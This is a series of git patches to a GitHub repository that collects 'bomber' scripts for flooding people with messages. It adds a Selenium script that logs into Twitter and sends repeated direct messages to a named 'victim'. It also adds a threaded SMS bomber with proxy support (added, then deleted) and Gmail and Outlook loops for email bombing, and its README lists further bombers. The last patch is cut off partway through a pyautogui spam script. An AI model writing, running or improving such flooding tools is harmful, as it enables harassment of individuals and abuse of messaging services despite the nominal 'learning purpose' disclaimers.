From fa324a112be92d829ff5fac4b597a109b63a6896 Mon Sep 17 00:00:00 2001 From: akshay kalucha Date: Tue, 29 Sep 2020 00:37:47 +0530 Subject: [PATCH 01/58] Initial draft of script --- Twitter_bomber.py | 88 +++++++++++++++++++++++++++++++++++++++++ test.py | 99 +++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 187 insertions(+) create mode 100644 Twitter_bomber.py create mode 100644 test.py diff --git a/Twitter_bomber.py b/Twitter_bomber.py new file mode 100644 index 0000000..29c8457 --- /dev/null +++ b/Twitter_bomber.py @@ -0,0 +1,88 @@ +from selenium import webdriver +import os +from webdriver_manager.chrome import ChromeDriverManager +import argparse +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.common.by import By +from selenium.webdriver.support import expected_conditions as EC +import time +from selenium.webdriver.chrome.options import Options + + +def banner(): + print(''' + _______ __ __ ____ ____ __ __ ____ + |__ __| \ \ / / | _ \ / __ \ | \/ | | _ \ /\ + | | \ \ /\ / / ___ __ _ _ __ | |_) | | | | | | \ / | | |_) | / \ + | | \ \/ \/ / / __| / _` | | '__| | _ < | | | | | |\/| | | _ < / /\ \ + | | \ /\ / \__ \ | (_| | | | | |_) | | |__| | | | | | | |_) | / ____ \ ☢️ + |_| \/ \/ |___/ \__,_| |_| |____/ \____/ |_| |_| |____/ /_/ \_\ + + By: akshaykalucha3 + Note : I won't be responsible for any damage caused by this script, Use at your own risk + + ''') + +parser = argparse.ArgumentParser(description='Bomb twitter user with spam messages') + +parser.add_argument('--username', type=str, required=True, help="twitter username @\ of user, can be his phone number or email") +parser.add_argument('--password', type=str, required=True, help="twitter password of the user") +args = parser.parse_args() + +chrome_options = webdriver.ChromeOptions() +chrome_options.add_experimental_option("detach", True) +driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options) + + +def bombMsg(n, txt): + for i in range(n): + WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#react-root > div > div > div.css-1dbjc4n.r-18u37iz.r-13qz1uu.r-417010 > main > div > div > div > section:nth-child(2) > div.css-1dbjc4n.r-1pz39u2.r-13awgt0 > div > div > div > div > aside > div.css-1dbjc4n.r-obd0qt.r-18u37iz.r-1uu6nss.r-13qz1uu > div.css-1dbjc4n.r-1kihuf0.r-16y2uox.r-1wbh5a2 > div > div > div > div > div.css-901oao.r-jwli3a.r-6koalj.r-16y2uox.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-qvutc0 > div > div > div > div.DraftEditor-editorContainer > div > div > div > div'))).send_keys(txt) + SendBtn = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div/section[2]/div[2]/div/div/div/div/aside/div[2]/div[3]') + SendBtn.click() + print("Bombing Complete !!!") + banner() + + +def attack(): + driver.get('https://twitter.com/login') + userId = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[1]/label/div/div[2]/div/input') + userId.send_keys(args.username) + userPass = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[2]/label/div/div[2]/div/input') + userPass.send_keys(args.password) + + loginBtn = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[3]/div') + loginBtn.click() + driver.minimize_window() + + name = input('Enter the twitter name of victim: ') + if len(name) >= 3: + pass + else: + name = input('Enter the name of victim correctly: ') + + ### GET VICTIM PROFILE PAGE ### + driver.get(f'https://twitter.com/{name}') + time.sleep(1) + driver.maximize_window() + + + ## GET MESSAGE INBOX ### + messageLink = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div/div[1]/div/div[2]/div/div/div[1]/div/div[1]/div/div[2]') + messageLink.click() + driver.minimize_window() + + #### SEND MESSAGE IN VICTIMS INBOX ### + + WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="react-root"]/div/div/div[2]/main/div/div/div/section[2]/div[2]/div/div/div/div/aside/div[2]/div[2]/div/div/div/div/div[1]/div'))).click() + MsgBx = driver.find_element_by_css_selector('#react-root > div > div > div.css-1dbjc4n.r-18u37iz.r-13qz1uu.r-417010 > main > div > div > div > section:nth-child(2) > div.css-1dbjc4n.r-1pz39u2.r-13awgt0 > div > div > div > div > aside > div.css-1dbjc4n.r-obd0qt.r-18u37iz.r-1uu6nss.r-13qz1uu > div.css-1dbjc4n.r-1kihuf0.r-16y2uox.r-1wbh5a2 > div > div > div > div > div.css-901oao.r-jwli3a.r-6koalj.r-16y2uox.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-qvutc0 > div > div > div > div.DraftEditor-editorContainer > div > div > div > div') + Ops = int(input("Select what form of messahe you would like to send: \n Enter [1] to send manual message Enter [2] to import a txt file: ")) + if Ops == 1: + Content = input("Enter the message: ") + elif Ops == 2: + fileLoc = input("Enter the file location: ") + instances = int(input("Enter total count: ")) + + bombMsg(instances, Content) + +attack() + diff --git a/test.py b/test.py new file mode 100644 index 0000000..9c485af --- /dev/null +++ b/test.py @@ -0,0 +1,99 @@ + +#!/usr/bin/python3 + +import requests +import argparse +from concurrent.futures import ThreadPoolExecutor +import json +import time +from Provider import Provider + +# args + +parser = argparse.ArgumentParser() +parser.add_argument('target', metavar='TARGET', type=lambda value: (_ for _ in ()).throw(argparse.ArgumentTypeError(f'{value} is an invalid mobile number')) if len(value) != 10 else value, + help='Target mobile number without country code') +parser.add_argument('--sms', '-S', type=int, + help='Number of sms to target (default: 20)', default=20) +parser.add_argument('--country', '-c', type=int, + help='Country code without (+) sign (default: 91)', default=91) +parser.add_argument('--threads', '-T', type=int, + help='Max number of concurrent HTTP(s) requests (default: 20)', default=20) +parser.add_argument('--proxy', '-p', action='store_true', + help='Use proxy for bombing (It is advisable to use this option if you are bombing more than 50 sms)') +parser.add_argument('--verbose', '-v', action='store_true', + help='Verbose') +parser.add_argument('--verify', '-V', action='store_true', + help='To verify all providers are working or not') +args = parser.parse_args() + +# config loading +target = str(args.target) +no_of_threads = args.threads +no_of_sms = args.sms +fails, success = 0, 0 +not args.verbose and not args.verify and print( + f'Target: {target} | Threads: {no_of_threads} | SMS: {no_of_sms}') + +# proxy setup +# https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true + + +def get_proxy(): + args.verbose and print('Gethering proxy...') + curl = requests.get( + 'https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true').text + if 'limit' in curl: + print('Proxy limitation error. Try without `-p` or `--proxy` argument') + exit() + args.verbose and print(f'Using Proxy: {curl}') + return {"http": curl, "https": curl} + + +proxies = get_proxy() if args.proxy else False +# proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} + +# bomber function + + +def bomber(p): + global fails, success, no_of_sms + if not args.verify and p is None or success > no_of_sms: + return + elif not p.done: + try: + p.start() + if p.status(): + success += 1 + else: + fails += 1 + except: + fails += 1 + args.verbose or args.verify and print( + '{:12}: error'.format(p.config['name'])) + not args.verbose and not args.verify and print( + f'Bombing : {success+fails}/{no_of_sms} | Success: {success} | Failed: {fails}', end='\r') + + +# threadsssss +start = time.time() +if args.verify: + providers = json.load(open('config.json', 'r'))['providers'] + pall = [p for x in providers.values() for p in x] + with ThreadPoolExecutor(max_workers=len(pall)) as executor: + for config in pall: + executor.submit(bomber, Provider(target, proxy=proxies, + verbose=True, cc=str(args.country), config=config)) + print(f'Total {len(pall)} providers available') +else: + with ThreadPoolExecutor(max_workers=no_of_threads) as executor: + for i in range(no_of_sms): + p = Provider(target, proxy=proxies, + verbose=args.verbose, cc=str(args.country)) + executor.submit(bomber, p) +end = time.time() + + +# finalize +print(f'\nSuccess: {success} | Failed: {fails}') +print(f'Took {end-start:.2f}s to complete') \ No newline at end of file From c742bbc20c2912a7d723195420f5d4631c29526c Mon Sep 17 00:00:00 2001 From: akshay kalucha Date: Tue, 29 Sep 2020 23:24:22 +0530 Subject: [PATCH 02/58] update commit --- Twitter_bomber.py | 2 +- debug.log | 4 ++ test.py | 103 ++++------------------------------------------ 3 files changed, 14 insertions(+), 95 deletions(-) create mode 100644 debug.log diff --git a/Twitter_bomber.py b/Twitter_bomber.py index 29c8457..4ebbd3d 100644 --- a/Twitter_bomber.py +++ b/Twitter_bomber.py @@ -6,6 +6,7 @@ from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.by import By from selenium.webdriver.support import expected_conditions as EC import time +import sys from selenium.webdriver.chrome.options import Options @@ -69,7 +70,6 @@ def attack(): ## GET MESSAGE INBOX ### messageLink = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div/div[1]/div/div[2]/div/div/div[1]/div/div[1]/div/div[2]') messageLink.click() - driver.minimize_window() #### SEND MESSAGE IN VICTIMS INBOX ### diff --git a/debug.log b/debug.log new file mode 100644 index 0000000..26901fa --- /dev/null +++ b/debug.log @@ -0,0 +1,4 @@ +[0929/005058.248:ERROR:process_reader_win.cc(123)] NtOpenThread: {Access Denied} A process has requested access to an object, but has not been granted those access rights. (0xc0000022) +[0929/005058.253:ERROR:process_reader_win.cc(123)] NtOpenThread: {Access Denied} A process has requested access to an object, but has not been granted those access rights. (0xc0000022) +[0929/005058.595:ERROR:exception_snapshot_win.cc(99)] thread ID 17208 not found in process +[0929/005058.596:ERROR:exception_snapshot_win.cc(99)] thread ID 22040 not found in process diff --git a/test.py b/test.py index 9c485af..aeeed4d 100644 --- a/test.py +++ b/test.py @@ -1,99 +1,14 @@ - -#!/usr/bin/python3 - -import requests -import argparse -from concurrent.futures import ThreadPoolExecutor -import json +import sys import time -from Provider import Provider -# args +print("Loading:") -parser = argparse.ArgumentParser() -parser.add_argument('target', metavar='TARGET', type=lambda value: (_ for _ in ()).throw(argparse.ArgumentTypeError(f'{value} is an invalid mobile number')) if len(value) != 10 else value, - help='Target mobile number without country code') -parser.add_argument('--sms', '-S', type=int, - help='Number of sms to target (default: 20)', default=20) -parser.add_argument('--country', '-c', type=int, - help='Country code without (+) sign (default: 91)', default=91) -parser.add_argument('--threads', '-T', type=int, - help='Max number of concurrent HTTP(s) requests (default: 20)', default=20) -parser.add_argument('--proxy', '-p', action='store_true', - help='Use proxy for bombing (It is advisable to use this option if you are bombing more than 50 sms)') -parser.add_argument('--verbose', '-v', action='store_true', - help='Verbose') -parser.add_argument('--verify', '-V', action='store_true', - help='To verify all providers are working or not') -args = parser.parse_args() +#animation = ["10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%", "100%"] +animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"] -# config loading -target = str(args.target) -no_of_threads = args.threads -no_of_sms = args.sms -fails, success = 0, 0 -not args.verbose and not args.verify and print( - f'Target: {target} | Threads: {no_of_threads} | SMS: {no_of_sms}') +for i in range(len(animation)): + time.sleep(0.2) + sys.stdout.write("\r" + animation[i % len(animation)]) + sys.stdout.flush() -# proxy setup -# https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true - - -def get_proxy(): - args.verbose and print('Gethering proxy...') - curl = requests.get( - 'https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true').text - if 'limit' in curl: - print('Proxy limitation error. Try without `-p` or `--proxy` argument') - exit() - args.verbose and print(f'Using Proxy: {curl}') - return {"http": curl, "https": curl} - - -proxies = get_proxy() if args.proxy else False -# proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} - -# bomber function - - -def bomber(p): - global fails, success, no_of_sms - if not args.verify and p is None or success > no_of_sms: - return - elif not p.done: - try: - p.start() - if p.status(): - success += 1 - else: - fails += 1 - except: - fails += 1 - args.verbose or args.verify and print( - '{:12}: error'.format(p.config['name'])) - not args.verbose and not args.verify and print( - f'Bombing : {success+fails}/{no_of_sms} | Success: {success} | Failed: {fails}', end='\r') - - -# threadsssss -start = time.time() -if args.verify: - providers = json.load(open('config.json', 'r'))['providers'] - pall = [p for x in providers.values() for p in x] - with ThreadPoolExecutor(max_workers=len(pall)) as executor: - for config in pall: - executor.submit(bomber, Provider(target, proxy=proxies, - verbose=True, cc=str(args.country), config=config)) - print(f'Total {len(pall)} providers available') -else: - with ThreadPoolExecutor(max_workers=no_of_threads) as executor: - for i in range(no_of_sms): - p = Provider(target, proxy=proxies, - verbose=args.verbose, cc=str(args.country)) - executor.submit(bomber, p) -end = time.time() - - -# finalize -print(f'\nSuccess: {success} | Failed: {fails}') -print(f'Took {end-start:.2f}s to complete') \ No newline at end of file +print("\n") \ No newline at end of file From b51835c12893d314568c888a08a8ca2b38f35f4b Mon Sep 17 00:00:00 2001 From: akshay kalucha Date: Wed, 30 Sep 2020 11:58:41 +0530 Subject: [PATCH 03/58] steps commit --- Twitter_bomber.py | 13 +++++++++++-- debug.log | 4 ---- 2 files changed, 11 insertions(+), 6 deletions(-) delete mode 100644 debug.log diff --git a/Twitter_bomber.py b/Twitter_bomber.py index 4ebbd3d..f0cb5a8 100644 --- a/Twitter_bomber.py +++ b/Twitter_bomber.py @@ -26,8 +26,17 @@ def banner(): parser = argparse.ArgumentParser(description='Bomb twitter user with spam messages') -parser.add_argument('--username', type=str, required=True, help="twitter username @\ of user, can be his phone number or email") -parser.add_argument('--password', type=str, required=True, help="twitter password of the user") +""" 4 Step: + + 1) run command python Twitter_bomber.py -u *your_twitter_username* -p *your_twitter_password* + 2) enter correct username of person you want to spam, make sure his twitter messages are open + 3) press 1 if you want to manually type the message you eant to send; or 2 if you want to export a file and extract message from there + 4) enter message count + +""" + +parser.add_argument('-u', '--username', type=str, required=True, help="twitter username @\ of user, can be his phone number or email") +parser.add_argument('-p', '--password', type=str, required=True, help="twitter password of the user") args = parser.parse_args() chrome_options = webdriver.ChromeOptions() diff --git a/debug.log b/debug.log deleted file mode 100644 index 26901fa..0000000 --- a/debug.log +++ /dev/null @@ -1,4 +0,0 @@ -[0929/005058.248:ERROR:process_reader_win.cc(123)] NtOpenThread: {Access Denied} A process has requested access to an object, but has not been granted those access rights. (0xc0000022) -[0929/005058.253:ERROR:process_reader_win.cc(123)] NtOpenThread: {Access Denied} A process has requested access to an object, but has not been granted those access rights. (0xc0000022) -[0929/005058.595:ERROR:exception_snapshot_win.cc(99)] thread ID 17208 not found in process -[0929/005058.596:ERROR:exception_snapshot_win.cc(99)] thread ID 22040 not found in process From ad4e404b625d08806c259e8308aa805e78a4859b Mon Sep 17 00:00:00 2001 From: VaradRege <70020939+VaradRege@users.noreply.github.com> Date: Thu, 1 Oct 2020 08:05:30 +0530 Subject: [PATCH 04/58] Updated fonts --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 385c470..45dd546 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: -SMS/Email/whatsapp Bombers Collection. +𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) : Working
![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) : Not- Working (Or need some modifications)
@@ -84,7 +84,7 @@ SMS/Email/whatsapp Bombers Collection. ## Note: -I am not responsible for any thing you do with this script -This is just for learning and knowledge purpose. +𝙄 𝙖𝙢 𝙣𝙤𝙩 𝙧𝙚𝙨𝙥𝙤𝙣𝙨𝙞𝙗𝙡𝙚 𝙛𝙤𝙧 𝙖𝙣𝙮 𝙩𝙝𝙞𝙣𝙜 𝙮𝙤𝙪 𝙙𝙤 𝙬𝙞𝙩𝙝 𝙩𝙝𝙞𝙨 𝙨𝙘𝙧𝙞𝙥𝙩 +𝙏𝙝𝙞𝙨 𝙞𝙨 𝙟𝙪𝙨𝙩 𝙛𝙤𝙧 𝙡𝙚𝙖𝙧𝙣𝙞𝙣𝙜 𝙖𝙣𝙙 𝙠𝙣𝙤𝙬𝙡𝙚𝙙𝙜𝙚 𝙥𝙪𝙧𝙥𝙤𝙨𝙚. ## Please contribute! From 4135632574efed7619b1fc35d71b7083c6cf8242 Mon Sep 17 00:00:00 2001 From: Anonymous Date: Thu, 1 Oct 2020 15:05:30 +0530 Subject: [PATCH 05/58] Update Email_bomber.py --- Email_bomber.py | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/Email_bomber.py b/Email_bomber.py index 0db16d2..1c1674e 100644 --- a/Email_bomber.py +++ b/Email_bomber.py @@ -14,14 +14,22 @@ try: message = input("Enter Message:") counter = int(input("How many message you want to send?:")) + # gmail of outlook + s_ = input('Select the service provider (Gmail / Outlook): ').lower() + + if s_ == "gmail": + mail = smtplib.SMTP('smtp.gmail.com',587) + elif s_ == "outlook": + mail = smtplib.SMTP('smtp.office365.com',587) + for x in range(0,counter): print("Number of Message Sent : ", x+1) - mail = smtplib.SMTP('smtp.gmail.com',587) mail.ehlo() mail.starttls() mail.login(email,password) mail.sendmail(email,bomb_email,message) time.sleep(1) + mail.close() except Exception as e: print("Something is wrong, please Re-try Again with Valid input.") From ad83c733169a248917ced834baf8140852996697 Mon Sep 17 00:00:00 2001 From: Sobhit jadoun <65443674+Hackertrackersj@users.noreply.github.com> Date: Thu, 1 Oct 2020 15:20:29 +0530 Subject: [PATCH 06/58] Update SMS_bomber.py --- SMS_bomber.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SMS_bomber.py b/SMS_bomber.py index 7e20c78..403b772 100644 --- a/SMS_bomber.py +++ b/SMS_bomber.py @@ -59,6 +59,6 @@ try: for number in numbers: send(number, int(input(f"Enter Number of Messages for {number} : ")), randint(3)) except Exception as e: - print("Something is wrong please Re-run this script.") + print("Something is wrong please Run again this script.") From cdd8f8ef87a94cd6a3f2436ccd3110e5dd588010 Mon Sep 17 00:00:00 2001 From: akshay kalucha Date: Thu, 1 Oct 2020 17:34:53 +0530 Subject: [PATCH 07/58] Twitter bomber fixes --- Twitter_bomber.py | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Twitter_bomber.py b/Twitter_bomber.py index f0cb5a8..8fd84b3 100644 --- a/Twitter_bomber.py +++ b/Twitter_bomber.py @@ -27,9 +27,12 @@ def banner(): parser = argparse.ArgumentParser(description='Bomb twitter user with spam messages') """ 4 Step: - + cautain: be sure your connection is fast and take no more than 4-5sec to enter username of the victim as chrome driver is stateless + and opening a new url after a interval of seconds may log you out of your twitter account. + 1) run command python Twitter_bomber.py -u *your_twitter_username* -p *your_twitter_password* - 2) enter correct username of person you want to spam, make sure his twitter messages are open + 2) enter correct username of person you want to spam, make sure his twitter messages are open, after message screen is opened, + minimize window 7 follow #3 3) press 1 if you want to manually type the message you eant to send; or 2 if you want to export a file and extract message from there 4) enter message count @@ -59,17 +62,19 @@ def attack(): userId.send_keys(args.username) userPass = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[2]/label/div/div[2]/div/input') userPass.send_keys(args.password) - loginBtn = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div[1]/form/div/div[3]/div') loginBtn.click() driver.minimize_window() + name = input('Enter the twitter name of victim: ') if len(name) >= 3: pass else: name = input('Enter the name of victim correctly: ') + + ### GET VICTIM PROFILE PAGE ### driver.get(f'https://twitter.com/{name}') time.sleep(1) @@ -80,8 +85,9 @@ def attack(): messageLink = driver.find_element_by_xpath('//*[@id="react-root"]/div/div/div[2]/main/div/div/div/div[1]/div/div[2]/div/div/div[1]/div/div[1]/div/div[2]') messageLink.click() - #### SEND MESSAGE IN VICTIMS INBOX ### + + #### SEND MESSAGE IN VICTIMS INBOX ### WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="react-root"]/div/div/div[2]/main/div/div/div/section[2]/div[2]/div/div/div/div/aside/div[2]/div[2]/div/div/div/div/div[1]/div'))).click() MsgBx = driver.find_element_by_css_selector('#react-root > div > div > div.css-1dbjc4n.r-18u37iz.r-13qz1uu.r-417010 > main > div > div > div > section:nth-child(2) > div.css-1dbjc4n.r-1pz39u2.r-13awgt0 > div > div > div > div > aside > div.css-1dbjc4n.r-obd0qt.r-18u37iz.r-1uu6nss.r-13qz1uu > div.css-1dbjc4n.r-1kihuf0.r-16y2uox.r-1wbh5a2 > div > div > div > div > div.css-901oao.r-jwli3a.r-6koalj.r-16y2uox.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-qvutc0 > div > div > div > div.DraftEditor-editorContainer > div > div > div > div') Ops = int(input("Select what form of messahe you would like to send: \n Enter [1] to send manual message Enter [2] to import a txt file: ")) From a5529cac84b3713ff3cb36daa7abeff48b3ed188 Mon Sep 17 00:00:00 2001 From: akshay kalucha Date: Thu, 1 Oct 2020 17:36:54 +0530 Subject: [PATCH 08/58] test.py deleted --- test.py | 14 -------------- 1 file changed, 14 deletions(-) delete mode 100644 test.py diff --git a/test.py b/test.py deleted file mode 100644 index aeeed4d..0000000 --- a/test.py +++ /dev/null @@ -1,14 +0,0 @@ -import sys -import time - -print("Loading:") - -#animation = ["10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%", "100%"] -animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"] - -for i in range(len(animation)): - time.sleep(0.2) - sys.stdout.write("\r" + animation[i % len(animation)]) - sys.stdout.flush() - -print("\n") \ No newline at end of file From e878e18df103ec5f68a431ac22677aac87b20ce6 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" Date: Fri, 2 Oct 2020 22:09:25 +0530 Subject: [PATCH 09/58] Update README.md --- README.md | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 45dd546..37c70d7 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: -𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ +𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡/Twitter 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) : Working
![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) : Not- Working (Or need some modifications)
@@ -41,7 +41,7 @@ ### EMAIL BOMBERS :e-mail: :boom: -![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) 1. Email_bomber.py -> sending continues email. +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Email_bomber.py -> sending continues email. Update with Outlook bomber as well - by [xyzricky](https://github.com/xyzricky) ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 2. Email_bomber -> sending continues email -by [zanyarjamal](https://github.com/zanyarjamal) @@ -67,6 +67,10 @@ ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 5. WhatsApp-Spam -> WhatsApp-Spam scripts - by [macr1408](https://github.com/macr1408) +### Twitter Bombers :boom: + +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Twitter_bomber.py -> Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open - by [akshaykalucha3](https://github.com/akshaykalucha3) + ### Others: ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. https://mailspammer.cf - Email Spammer Website. Spam piles and piles of emails! - by [WOLFIE_OG](https://github.com/WOLFIE-OG) @@ -80,7 +84,9 @@ :octocat: [scienceLabwork](https://github.com/scienceLabwork)
:octocat: [cclauss](https://github.com/cclauss)
:octocat: [rduttshukla](https://github.com/rduttshukla)
-:octocat: [LucasNcipha](https://github.com/LucasNcipha)
+:octocat: [LucasNcipha](https://github.com/LucasNcipha)
+:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)
+:octocat: [xyzricky](https://github.com/xyzricky)
## Note: From be8eeb4ff18c443c17e0c1fb6eed5cb0156cf773 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" Date: Thu, 8 Oct 2020 18:02:55 +0530 Subject: [PATCH 10/58] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 37c70d7..c233665 100644 --- a/README.md +++ b/README.md @@ -79,6 +79,8 @@ ## Contributors: +To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. + :octocat: [iMro0t](https://github.com/iMro0t)
:octocat: [rizwansoaib](https://github.com/rizwansoaib)
:octocat: [scienceLabwork](https://github.com/scienceLabwork)
From ba6ad5ad577fa973b444d961a66f2a2d7c308790 Mon Sep 17 00:00:00 2001 From: RIZWAN AHMAD Date: Fri, 9 Oct 2020 20:09:08 +0530 Subject: [PATCH 11/58] not working so updated --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c233665..2237ee5 100644 --- a/README.md +++ b/README.md @@ -63,7 +63,7 @@ ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 3. wbomb_version2.py (coming soon) -> Whatsapp-bomber sending multipal message to multipal users. -![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 4. WhatsApp-Bomber -> WhatsApp Monitor+Bomber (Chrome Extension) - by [rizwansoaib](https://github.com/rizwansoaib) +![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) 4. WhatsApp-Bomber -> WhatsApp Monitor+Bomber (Chrome Extension) - by [rizwansoaib](https://github.com/rizwansoaib) ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 5. WhatsApp-Spam -> WhatsApp-Spam scripts - by [macr1408](https://github.com/macr1408) From 2468cce55bf4500de646dddbdc4bcf1a4fc3538d Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" Date: Fri, 6 Nov 2020 12:59:27 +0530 Subject: [PATCH 12/58] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 2237ee5..5b847bb 100644 --- a/README.md +++ b/README.md @@ -77,6 +77,8 @@ ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 2. HPomb -> HPomb Call, SMS and mail bomber all in one - by [HoneyPots0](https://github.com/HoneyPots0) +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 3. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [b31ngD3v](https://github.com/b31ngD3v) + ## Contributors: To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. From d9629eab9a810dccb3936fb48038fafbfc9fea49 Mon Sep 17 00:00:00 2001 From: timofey260 <69044246+timofey260@users.noreply.github.com> Date: Sun, 29 Nov 2020 14:44:00 +0300 Subject: [PATCH 13/58] Create spam.py Dosen't work on phone --- spam.py | 154 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 154 insertions(+) create mode 100644 spam.py diff --git a/spam.py b/spam.py new file mode 100644 index 0000000..26dfb83 --- /dev/null +++ b/spam.py @@ -0,0 +1,154 @@ +#pip install pyautogui +#please download last version on github +#don't work on mobile' +import pyautogui +from time import sleep # sleep block on load{wait...} +from colorama import Fore, init # for colored text +from os import system # system use for clear messages +init(Fore) # colorama init +uns = '' #unuse str. uses for def error() +cr = (' ____________________________________________ \n' + '|-----------------Made by Timofey------------|\n' + '|Discord: TiMoFey#5066 |\n' + '|Github: https://github.com/timofey260/pyspam|\n' + '|site: https://timofey26s.tilda.ws |\n' + '|____________________________________________|\n') + +err = ( ' _________________________________________________________ \n' + '|---------------------------Errors------------------------|\n' + '|1. FileError: file not found! |\n' + '|2. NumError: {str} not a number! |\n' + '|3. IndexError: index out of range! |\n' + '|4. TypeError: {str} is not 1,2 or 3! |\n' + '|5. ListError: Error not found! correct def error() |\n' + '|_________________________________________________________|\n') +b = ('_____ + \n' + ' | /\\ /\\ \n' + ' | | / \\ / \\ \n' + ' | | / \\ / \\ \n' + ' | | / \\/ \\ \n' + '========spam_programm======= \n') # menu +print(Fore.RED + b) +def error(num, result): # errors: easy moding + if num == 1: + print('FileError: file not found!') + input() + elif num == 2: + print('NumError: %1s not a number!' %(result)) + input() + elif num == 3: + print('IndexError: index out of range!') + input() + elif num == 4: + print('TypeError: %1s is not 1,2 or 3!' %(result)) + input() + else: + print('ErrorError: Error not found! correct def error()') + input() + exit() + + +print(Fore.YELLOW + "[" + Fore.CYAN + "1" + Fore.YELLOW + "]file") #menu buttons +print(Fore.YELLOW + "[" + Fore.CYAN + "2" + Fore.YELLOW + "]message") +print(Fore.YELLOW + "[" + Fore.CYAN + "3" + Fore.YELLOW + "]credits") +print(Fore.YELLOW + "[" + Fore.CYAN + "4" + Fore.YELLOW + "]Errorlist") 